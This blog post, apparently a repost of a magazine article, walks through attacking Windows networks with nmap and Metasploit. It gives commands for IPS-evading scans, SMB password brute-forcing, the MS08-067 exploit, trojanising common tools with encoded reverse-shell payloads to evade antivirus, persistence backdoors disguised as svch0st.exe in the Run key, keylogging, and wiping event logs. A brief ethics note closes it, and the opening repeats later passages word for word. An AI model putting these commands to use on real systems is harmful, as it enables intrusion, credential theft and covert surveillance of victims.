Overview
In hakin9.org February release, I have wrote more on the latest version of nmap as well as metaploit how it could harm your network. In the article you will have an idea what does metasploit can offer you. I would like to share the in and out of the tools and how it can beneficial to any of the security practitioner.Below will be the content of the articles.
The art of scanning is very important and we always try to gain information about the targets without revealing your presence or intentions. One of the preferred options for scanning will be the stealth TCP scan against the remote system. As you can see from the figure 1: the result of nmap scanning will give you an idea what is running on the remote server with the list of running ports, along with a description that have been detected.
for i in `seq 1 254`;
do
ping -c 1 10.1.1.$1 | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
done
nmap -p 139 x.y.z.* -oG 139.txt
cat 139.txt | grep open | cut -d" " -f2
cat 139.txt | grep open | cut -d" " -f2 > 139-ips.txt
nmap -O -iL 139-ips -oG 139-os.txt
cat 139-os.tx | grep open | cut -d":" -f4
Password Username
mypassword administrator
password1 admin
Next will be executing the command and you will be able to check the password
FOR /F "token=1, 2*" %i in (password.txt) do net use \\remoteserver\ipc$ %i /u:%j
Do you see this how easy we can built a tools within windows?. But how about linux scripting?. The approach will be the same, just the syntax will be different from windows.The first thing that you need to do is to have a dictionary files called as credential. The content of the files will be as the following:
password1
password2
Next step will be open a shell from the linux and type the following command.
for I in `cat credential`;do smbclient -L remote ip --user=administrator%$I; done
What does the command does is it reads the credential files and puts in "I" which is a variable. After that the command will use smbclient to connect to the remote host with the username administrator. The %$I contains information of the credential file.
As you have learn for far, there are 2 approachs, one for windows and one for linux scripting. One good news regarding to metasploit, it also have the similar functionality. As you can see from figure 4, we have a lot of options for checking weak password on the network. If you want to scan an entire network you can set this on RHOSTS by typing set RHOST 192.168.238.1-200. This can minimize your effort in developing new code.
Figure 4: Password auditing tools in metasploit
The power of
exploitation tools
Since 2011, we have heard
about a lot of incidents around the world about confidential information being
compromised, government website being defaced and big corporation networks
crippled for some reason. The famous example will be the anonymous
group, but have you ever wonder why the success factor is? Is this the new area
of the modern ninja?
Introduction
Till now,
we don't much hear in the news mentioning, corporate network attack by ninja.
Rather we hear the term blackhat. Blackhat practitioners have the similar
practices as the ancient ninja. The tools used by ninja today will be different
than the ancient. The most common technique they use will be scanning and
exploitation. I will cover the 2 important areas and type of attacks using nmap
and metasploit.
What does a malicious hacker do
Is either a
blackhat or whitehat they do know what
is required to hack a system or to secure a system. Below are the 4 core areas
that are part of the cycle:
- Scanning
- Gaining access
- Maintaining access
- Clearing tracks
NMAP Scanning
NMAP is by
the far is the most popular port scanning tools. Why it was so popular? It’s
because NMAP provides the following information for attackers:
- Live host on the network, although it some cases the security administrator will block the ICMP to avoid the detection. Nmap can detect those host by applying a command such as nmap ip address –Pn parameter at the end of the command.
- Identified target information such as OS detection (nmap ip address -O), service detection (nmap ip address -sV).
- And it is also scriptable interaction with target (e.g. nmap –sT –scrip=smb-check-vulns –P0 ip address). The scanning will detect whether there is any machine on the network which are not bee patches with MS08-067.
From the information collected, you will have more
visibility on what are the target machine is and you can properly plan for your
attack.
The art of scanning is very important and we always try to gain information about the targets without revealing your presence or intentions. One of the preferred options for scanning will be the stealth TCP scan against the remote system. As you can see from the figure 1: the result of nmap scanning will give you an idea what is running on the remote server with the list of running ports, along with a description that have been detected.
As on
figure 1, this type of scanning won’t be working on the host anymore as you
know intrusion prevention system is been implemented across system for a better
protection. Although you did see in figure 1, we did use the –sS (sync scan)
and –A(enable all detection), this is no longer recommended to use as we have
another piece of software which is IPS that we need to bypass. The –A flags is
not advice to use where by IPS exists as the scanning containing a lot of
noise.
On most of
the time, if we need to perform a stealth scanning, the following technique
need to be in place like the above :
- nmap -v -Pn -sS -f --mtu 32 --data-length 50 --source-port 99 --randomize-hosts -T 1 192.168.238.131
- -sS is a half-open or Syn scan. These scans do not complete all three steps of the TCP hand shake and there for has a chance of not being logged or picked up by an IPS. The default tcp syn scan attempt to identify the 1000 most commonly use tcp port.
- -f frament packet.This fragments your packet. The idea here is to split up the TCP headers over many packets in order to make it harder for a firewall or IPS to understand the pattern.
- --mtu is specific MTU size. It is almost same as –f option. In this example we are using mtu size of 32 and the size must be in the following(e.g.8,16,24,32…)
- --data-length spec length of the packet. This is important to avoid some of the firewall vendor to known the predictable size. In this example we have added 50 bytes to all packet.
- --source-port specify source port to bypass poor firewall config
- --randomize-hosts = a typical IDS or IPS signature might pick up if you scan multiple target hosts in order. Randomizing the order in which you scan helps avoid this. In this option you might want to consider when you have a list of ip to scan.
- -T 2 This is the timing setting When done with a full port range (-p1-65535) on four IP’s it takes 1000 seconds to complete. The -T2 option is the time setting, T1 is the slowest.
But as you
can see, each time when you do perform information gathering nmap does give you
a lot of information and it won’t be pragmatic if you keep all of that
information in a single file. This is where metasploit comes into the picture
to reduce the effort. All information that was been scanned will keep into
database rather than a flat file.
NMAP Integration with database
Once we
know what are we looking for, we need to document all our findings into a
proper format so that we can easily find those vulnerable machines that we plan
to exploit. As in my previous example, we have learned how to use the stealth
technique on performing scanning on the server. Now we need to output our
scanning into a usable format. In my past experience, I did use a lot of bash shell scripting to
find to perform the same task as NMAP.
Before I go
into the easier way, I would like to share the following, the script perform a
scan into the subnet 10 and try to find the live host and filter only windows
server. The method is messy as it contains too much code , but if you are good
in shell you are in control in the game.
#!/bin/bashfor i in `seq 1 254`;
do
ping -c 1 10.1.1.$1 | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
done
nmap -p 139 x.y.z.* -oG 139.txt
cat 139.txt | grep open | cut -d" " -f2
cat 139.txt | grep open | cut -d" " -f2 > 139-ips.txt
nmap -O -iL 139-ips -oG 139-os.txt
cat 139-os.tx | grep open | cut -d":" -f4
The other method
is much easier, what we need to do is use the same command to run the scan and
export it into xml format. What we need to do will be to use the above command nmap –sS –Pn –A –oX subnet10 10.1.1.0/24.
What you will be expected will be a file name as subnet10.xml will be created.
Storing
scan result into Metasploit
Take note that
mysql is no longer supported in metasploit and you will need to use postgresql
as the main database. The database it is not part of the package and you need
to install it manually. The steps of installing is not hard, you can follow the
steps as below. I have attached some of the mini steps for you to follow.
- You can install the server and client by issuing the following command apt-get install postgresql-8.4 postgresql-client-8.4.
- This would be the path where you can start the service , /etc/init.d/postgresql-8.4 start.
- Next
step you will need to disable the SSL in the config file. To do thisnano
/etc/postgresql/8.4/main/postgresql.conf. Find the content as above:
#ssl = true # (change requires restart)
- Now we are done with the postgresql,next step we would need to start the service by typing the following command /etc/init.d/postgresql-8.4 start.
- To configure the password you can use the following command
- Open the terminal and type the following ALTER USER postgres WITH PASSWORD 'mypassword ';\q sudo passwd -d postgres. I believe some of you who have been using mysql will see it is easier to use.
The next steps would be creating the
databases in metasploit and load the scan xml from nmap into it. What we need
to do is to load the metasploit console. I will write down the summary in 3
steps.
- Load metasploit by typing msfconsole. This is the command to start the engine.
- Db_connect postgres:mypassword@127.0.0.1/mypentest. The above syntax will create a new database called as mypentest with all the required tables. The format can be summarized as the following db_connect username:password@localhost/databasename
- Db_import subnet10, will help you to import the scan that you have perform earlier into the database. Do take notes that nmap scanning doesn’t give you an idea what are those vulnerabilities is but it give you an idea on those port and finger printing the operating system.
- However for the sake of testing purpose in backtrack 5, we can do a further check on the smb vulnerabilities by typing the above command nmap –sT –script=smb-check-vulns –P0 10.0.0.1. I see this is a pretty awesome command for you to start test. As you know in a lot of organization will have some challenges in patch management. By doing this we can straight to the point on the areas that we would like to exploit.
Motive
of the attacker
After we have
run through the scanning tools, the 2nd step will finding the system
that we can further attack. The most common vulnerability that insider
espionage are likely to use are the following. Most probably you will think
that the 4th point is likely to be a waste of time and you will never find
those in the network. What if you have more than thousands of server to check,
I believe it will have at least 1% of the server that is not properly managed.
However I would like to cover more than just software exploitation. We as the
administrator have an important part of managing server, but have ever you
thought those tools we use are free from malware? In this article I will cover
how we can re-engineering the software without breaking the software. This is
important to detect the antivirus scanning.
- Un-patched Microsoft Windows Server
- Weak admin password
- Sql server
- Vnc server which provide graphical access to remote system which have the similarity to Microsoft’s Remote Desktop
- Sending malware to the users.
What
is metasploit
The Metasploit Project
is an open-source computer security project which
develop by HD Moore. Over the years, the tools have improved since October
2003. Originally there were 11 exploits and guess what are the total number
now? Now the framework consists of 798 exploit and 246 payloads. Metasploit is
comes in a free and commercial versions, which are updated on regular basis.
You can always update the software by issuing the msfupdate command to get the
latest exploit and test it out.
What
can Metasploit really do?
Judging from the name of the tools,
you know that the usage of the tools is to exploit a vulnerable system. Before
I get started what we will do with the software, you must know what metasploit
can do. One of the features that may be good to remove is the db_autopwn, which
allows you to perform an automatic attack on the hosts. This might allow
unintentional attack. What I would like to cover next will be the 5 attack
vectors that are most commonly used.
Attack vector 1: Un-patch Microsoft Windows Server
Attacking a
windows machine seems to be quite common in today's technology, this is due to
the lack of patch management as well other factors which would be running a non
genuine Microsoft product. How would the attacker start, most probably with the
common vulnerabilities which is MS08-067. This is not a joke, as there are some
organization never patches their systems. There are two approaches to start an
attack; the first approach is we just do a guess that they have a vulnerable
system and the 2nd approach will be using scanner which I have
explained earlier.
Metasploit it is
not so hard to use, if we know the concept of using it. In each of the attacks
what we need would be the exploit and also payload. Exploit is the term we use
to describe when there is unforeseen protective measure that might be in place
to prevent a particular exploit.
Payload is the
code that we want the system to interact with the attacker on the successful
exploitation. To start metasploit, we must run the first command which is
msfconsole, which displays the most common screen we use.
To find the exploit
for MS08-067, we can issue a command “search ms08-067”, and you can find where
the exploit located. There are some flexibilities that are built-in.
Figure 2 :
Example configuration on exploiting vulnerabilities on windows xp
As you can see
on the Figure 2, metasploit has been configure to use the MS08-067
vulnerability on the target host. As you can see the payload we use meterpreter
which can provide a lot more flexibility in term handling the remote system. In
the payload option LPORT has been set to port 8080, as most likely port 8080
will be proxy and its even better if we could set it to a well known port to
avoid detection such as port 80 and port 443.If you want to see the list of the
meterpreter option, you can always type the help command to see all the
available option.
- Core command
- File system
- Networking
- System
- User interface
- Webcam
- Elevate
- Password database
- Timestomp
As you can see
on figure 3, we have get the hashes. In some cases , admin user id will be
renamed to other name to hide its role. But however each of the user id will
have its own SID to differentiate it from other. The value 500 is the
identified to show that the user id is administrator.
In this example,
we will collect the information as below. We need to extract the information
from the above which is 11cb3f697332ae4cc295285c92cd06b4 and copy it over to http://www.onlinehashcrack.com/index.php. Why we are doing this is to find
what are the original password for the exploited machines.
Administrator:500:11cb3f697332ae4cc295285c92cd06b4:4424147a7dcd3c47c4ec3921443023bd:::
Attack vector 2 : Weak admin password
Checking for
weak password has become a must-know skill in all of the security arena. Although they are many commercial software
scanners out in the market that could provide the functionality, I would like to show you 3 option which we
can do in windows server and linux server using script as well using metasploit
as our core tools.
Let start with
the windows scripts; first what you need to do is type the following at the
command prompt. You will need to have a credential file which is password.txt.
The format of the password.txt will be following:
Password Username
mypassword administrator
password1 admin
Next will be executing the command and you will be able to check the password
FOR /F "token=1, 2*" %i in (password.txt) do net use \\remoteserver\ipc$ %i /u:%j
Do you see this how easy we can built a tools within windows?. But how about linux scripting?. The approach will be the same, just the syntax will be different from windows.The first thing that you need to do is to have a dictionary files called as credential. The content of the files will be as the following:
password1
password2
Next step will be open a shell from the linux and type the following command.
for I in `cat credential`;do smbclient -L remote ip --user=administrator%$I; done
What does the command does is it reads the credential files and puts in "I" which is a variable. After that the command will use smbclient to connect to the remote host with the username administrator. The %$I contains information of the credential file.
As you have learn for far, there are 2 approachs, one for windows and one for linux scripting. One good news regarding to metasploit, it also have the similar functionality. As you can see from figure 4, we have a lot of options for checking weak password on the network. If you want to scan an entire network you can set this on RHOSTS by typing set RHOST 192.168.238.1-200. This can minimize your effort in developing new code.
Figure 4: Password auditing tools in metasploit
Attack vector 3 : Sql server
Database servers
are always the critical server in handling and processing business requirement.
However some of the organizations have a lack of knowledge from the point of
security. Instead of security, money was invested in high availability of the
server to avoid hardware failure and so on. But however high availability on
single database server is not guaranteed if the standard security practices is
not in place.
Metasploit has
the option of validating if there are any weak passwords in the network, and
the most common module we use in metasploit will be scanner/mssql/mssql_login.
This is a very important phase of finding the right password before we can go
to figure 5. Once we have gotten the password, we can set the configuration as
on figure 5 and run the command exploit. If it works we have control of the
remote server operating system.
Attack vector 4 : Vnc server
This is my
favorite attack among the rest. This is because we are trying our luck whether
in the network there is any VNC server running without passwords. As you know,
VNC is a console mode, which mean that after you use the session and you don’t
lock it, we can see the similar unlock screen on other hosts. Metasploit has
the option to find any of these systems with no password. This can better help
you in term of managing the risk of been exploited. The first thing that you
need to do is search for vnc in the metasploit console; if any are found you
will see a list of vnc modules. On this article I will be choosing bypassing vnc
options, as you can see below the AUTOVNC have been set to true. By default the
configuration is false. If we are successful to attack a remote server, the vnc
screen will appear on the attacker screen. However, they are some risk of using
the above method. Once you are connected, the VNC icon in the remote server
will turn into black. Which mean that is someone is watching, they will see
someone connecting to the machines.
Attack vector 5 : Sending malware to the users
Among of all the
attacks, the attack vector 5 is the most scariest among all. I will explain
here why that is. In your organization, you are the system administrator and
you use a lot of tools to manage the system. Those tools will be from
Microsoft, Sysinternals or any free software providers. Have ever you thought
how valid is those files are? Let take an example; I believe everyone has a
file server at their organization and where better to store all the required
files for safety purposes as file server?
But how do you
guarantee that the files you use daily for system administration have not been
compromised by malware?. When your antivirus scan the files, it detect nothing
and you believe this files is free from malware. What if I told you that is
wrong. Now we have the abilities to hide the malware from the any antivirus
software. The reason behind this attack is each time the user launches the
software it will automatically connect back to the attackers. From there the
attackers can launch a different type of attack depending on their motive.
Then again, we
will use the same payload which is windows/meterpreter/reverse_tcp and setting
the LPORT to 8080 to avoid any detection. What we need to do is to encode our
binary with shikata_ga_nai. First step of doing it will be download any
software that are commonly use by the users such as putty, excel viewer or etc.
Copy the files over to /opt/frameworks/msf3/work.
From here we
will encode the the binary by issuing
the following command msfpayload windows/meterpreter/reverse_tcp
LHOST=attacker_ip_address LPORT=8080 R | msfencode -t exe -x
/opt/framework/msf3/work/myfiles.exe -o /root/Desktop/back.exe -e
x86/shikata_ga_nai -c 5
On this round we
use 5 time encoding which shown as –c 5, the more you do the better the chances
for sneaking past the antivirus. When this stage is finished, we have completed
the task of creating the binary.
From the
attacker side, they would run the command:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.238.133 LPORT=8080.
Next we would
need someone to click on the files and from there we can launch the attack. The
scary part of this is, what if your IT support team were using these infected
files, and they have no way of telling whether the files are infected with
malware or not.
Maintaining
access by planting backdoor
Once we have exploited the machine
and we have access to the server, maybe this would be the temporarily access.
We might want to revisit the system to get more information on the system:
Install
as service
Windows might be rebooted for some
reason such as maintenance or crash, most probably you will like to create a
backdoor as a service so next time you won’t be needed to perform the same
exploit all over again. What you need to do is just wait for the client to
power up the machines again. Persistence
flag you only can use once you have exploited the machine and this is where you
start installing it as service. I always will prefer to use the port 443 or 80
as this is a common port.
meterpreter > run persistence -S -i 7 -p 443 -r 192.168.238.133
[*] Running Persistance Script
[*] Resource file for cleanup
created at
/root/.msf4/logs/persistence/WINXP-1_20120211.1431/WINXP-1_20120211.1431.rc
[*] Creating
Payload=windows/meterpreter/reverse_tcp LHOST=192.168.238.133 LPORT=443
[*] Persistent agent script is
609615 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\herNEE.vbs
[*] Executing script C:\WINDOWS\TEMP\herNEE.vbs
[+] Agent executed with PID 2952
[*] Installing as service..
[*] Creating service hDFbkpZQqoTkBx
Once the system is rebooted, you can
connect back to the host by using the multi handler option. But these way only
works for some windows machine which have weak antivirus management. But for
the sake of proof of concept. You can try this out to know how the entire
framework works.
Capturing
keyboard stroke
Some of the attackers when they have
exploited the machines, their intention is not to disrupt the availability of
the system, but they will have interest to know on stealing the information,
one of the way to do it will dumping all keystroke. Before that they must know
each of the services is corresponding to which service. In most of the attack
the attacker will attack the 2 main services which is winlogon.exe and
explorer.exe.
Reason for attacking explorer.exe is
simple, they want to know what are the users is typing on the screen. For
example if the users is doing some bank transaction over a web browser, those
keystroke will be capture. While for winlogon.exe will be toward capturing the
password of the users. Although they are other method which to get the LM hash
and decrypted it online. In this type of attack you will just need to know 5
command :
- Ps – this command is to list down all the running process on the windows machine, if you would like to attack winlogon.exe or explorer.exe. You must look for the pid number.
- Migrate – once you have the pid number , you can type this to migrate to the explorer pid (e.g. migrate 776)
- Getpid –if you need to switch between pid, sometime you might check you are on which pid. But mostly we don’t use it much.
- Keyscan_start – This is the most interesting part, where we start the keylogger.
- Keyscan_dump – Once the keylogger is started, you need to type the entire command and see whether they is any new keystroke recorded.
Creating
an automatic backdoor
Creating a backdoor always a
challenge as the antivirus have been updated with the latest prevention to make
sure those files are not been installed into the machines. My favorite is to
create an exe with a name that is almost similar name in the operating system.
Some of the examples will be like svchost.exe, you can create a new backdoor
name as svch0st.exe. If you notice carefully both names are almost the same,
rather the “o” I replace with”0”.
First steps is to create a file by
using the following command, which to ensure that antivirus can’t detect this
is a backdoor. For the lport I use port 443, is just to hide the fact that the
user are browsing internet.
msfpayload
windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=443 R |
msfencode -t exe -x /opt/framework/msf3/work/svchost.exe -o /root/Desktop/svch0st.exe
-e x86/shikata_ga_nai -c 5
Next step will be uploading the
backdoor to the system32 .You can use the above command for uploading
upload /root/Desktop/svch0st.exe
c:\\windows\\system32\\
Before you do any further
modification to the registry, you can have a look into the startup process name
in the registry and plan for a better name. The syntax will be as below :
reg enumkey -k
HKLM\\Software\\Microsoft\\WIndows\\CurrentVersion\\Run
Once you have determine the name,
you can use the following command to create a startup service. Each time the
machine reboot, the service will be automatically startup and the victim will
connect back to you via port 443.In the example below I use the name
windowsvalidationservice rather than I use the name backdoor.
reg setval -k
HKLM\\Software\\Microsoft\\WIndows\\CurrentVersion\\Run -v WindowsValidationService
–d c:\\windows\system32\\svch0st.exe
Once you all this setup, the next
thing that you need to do is setup the multihandler and wait them connect back
to you which I have explain in attack vector 5.
As you can see that, you have the
ability to manipulate the registry setting, if you want to attack on yahoo
messenger. You can even download the entire registry settings from
HKEY_Current_users\software\yahoo\pager and install the registry into your PC.
This is also one of the way of stealing identity.
Clear
your tracks
This would be the last phase of the
attack, of course you won’t want people to catch you for all the damages that
you have did. The most important part will be deleting the logs. The last step
is the most simple step, what you need to do is just type a single command
which is clearev. What does this
command do is, it will delete everything from the logs.
Note
on ethics
Our intention, when we started
writing these articles was to give an overview what tools exists on the market
and how we can use it to secure our organization against any unidentified
threats. When you start to use the tools above, please do make sure you have
this with you:
Don’t use this for any malicious
intention
Don’t attack any organization
without any approval from the top management.
Think of the damage that you might
cause
Conclusion
In this article, we have presented the abilities of the
NMAP as well as metasploit on backtrack 5. We have shown the trick of hiding in
the network while we are performing intelligent information gathering. The
author also shows you a common attack that commonly done by the attacker and to
show how fast they compromise a system. As you can see, the growing of the
tools can help anyone to be a security pentester, while if it is been used in a
wrong hands it could bring more damage than good. Such and attack is much
easier to perform and more likely to succeed. The author sincerely hopes that
these short articles can increase the awareness to anyone who is handling
computer or security services. In the broader sense however, we hope that the
information could help you to increase the security your organization assets in
better manner.
Summary
Stay tune with my next articles. Let us know what you though , learns and
hope for next articles!. Connect with us on GOOGLE+ , TWITTER and FACEBOOK.
No comments:
Post a Comment